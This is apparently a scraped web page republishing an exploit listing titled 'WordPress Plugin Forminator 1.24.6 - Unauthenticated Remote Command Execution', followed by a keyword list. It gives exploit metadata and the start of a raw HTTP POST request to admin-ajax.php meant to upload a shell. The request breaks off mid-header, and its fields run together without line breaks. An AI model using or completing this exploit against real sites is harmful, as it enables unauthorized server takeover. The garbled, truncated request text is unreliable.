WordPress Forminator 1.24.6 Shell Upload - KizzMyAnthia.com

# Exploit Title: WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution# Date: 2023-07-20# Exploit Author: Mehmet Kelepçe# Vendor Homepage: https://wpmudev.com/project/forminator-pro/# Software Link: https://wordpress.org/plugins/forminator/# Version: 1.24.6# Tested on: PHP - Mysql - Apache2 - Windows 11HTTP Request and vulnerable parameter:-------------------------------------------------------------------------POST /3/wordpress/wp-admin/admin-ajax.php HTTP/1.1Host: localhostContent-Length: 1756sec-ch-ua:Accept: */*Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryTmsFfkbegmAjomneX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML,

Related Keywords

, Software Link , Exploit Title , Wordpress Plugin Forminator , Unauthenticated Remote Command , Exploit Author , Mehmet Kelep , Vendor Homepage ,